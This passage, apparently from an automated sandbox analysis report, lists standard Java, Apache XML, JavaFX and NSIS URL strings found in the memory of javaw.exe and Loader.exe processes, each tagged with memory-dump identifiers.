                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/localeF
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/schema/external-noNamespaceSchemaLocation
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/schema/external-schemaLocation
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/schema/external-schemaLocationJ
                    Source: javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/security-manager
                    Source: javaw.exe, javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/xmlschema/1.0/anonymousTypes
                    Source: javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/xmlschema/1.0/anonymousTypesD
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A66F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://asm.objectweb.org
                    Source: javaw.exe, 00000003.00000002.4552068701.000000006BF13000.00000002.00000001.01000000.0000000B.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000A418000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://bugreport.sun.com/bugreport/
                    Source: javaw.exe, 00000003.00000002.4552068701.000000006BF13000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://bugreport.sun.com/bugreport/java.vendor.url.bughttp://java.oracle.com/java.vendor.urljava.ven
                    Source: javaw.exe, 00000003.00000002.4552068701.000000006BF13000.00000002.00000001.01000000.0000000B.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000A41D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://java.oracle.com/
                    Source: javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/jaxp/xpath/dom
                    Source: javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/jaxp/xpath/domI
                    Source: javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/dom/properties/
                    Source: javaw.exe, javaw.exe, 00000003.00000003.2228038429.00000000159BB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.00000000159BE000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.00000000159BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/dom/properties/ancestor-check
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/jaxp/properties/
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaLanguage
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaSource
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/schema/features/
                    Source: javaw.exe, javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/schema/features/)
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespace
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespace3
                    Source: javaw.exe, javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/stream/properties/
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000AA94000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/stream/properties/ignore-external-dtd
                    Source: javaw.exe, javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/stream/properties/ignore-external-dtddtd9
                    Source: javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/stream/properties/reader-in-defined-state
                    Source: javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000AA94000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/xml/stream/properties/report-cdata-event
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000AA64000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://javafx.com/fxml/1
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000AA64000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://javafx.com/javafx/8
                    Source: javaw.exe, javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javax.xml.XMLConstants/feature/secure-processing
                    Source: javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javax.xml.XMLConstants/property/
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalDTD
                    Source: javaw.exe, javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalDTDR
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalSchema
                    Source: javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalSchema$
                    Source: javaw.exe, javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalStylesheet
                    Source: javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalStylesheet8
                    Source: javaw.exe, javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javax.xml.transform.dom.DOMResult/feature
                    Source: javaw.exe, javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javax.xml.transform.dom.DOMSource/feature
                    Source: javaw.exe, javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javax.xml.transform.sax.SAXResult/feature#
                    Source: javaw.exe, javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javax.xml.transform.sax.SAXSource/feature
                    Source: javaw.exe, javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javax.xml.transform.sax.SAXTransformerFactory/feature
                    Source: javaw.exe, javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javax.xml.transform.sax.SAXTransformerFactory/feature/xmlfilter
                    Source: javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javax.xml.transform.sax.SAXTransformerFactory/featureF
                    Source: javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javax.xml.transform.stax.StAXResult/feature
                    Source: javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javax.xml.transform.stax.StAXSource/feature
                    Source: javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javax.xml.transform.stream.StreamResult/feature
                    Source: javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javax.xml.transform.stream.StreamSource/feature
                    Source: Loader.exe, 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmp, Loader.exe, 00000000.00000003.2075234832.000000000088B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000000.2070869856.0000000000409000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                    Source: javaw.exe, javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/feature/use-service-mechanism
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000ACF5000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4545639440.0000000016A16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/technetwork/java/javafx/index.html
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/is-standalone
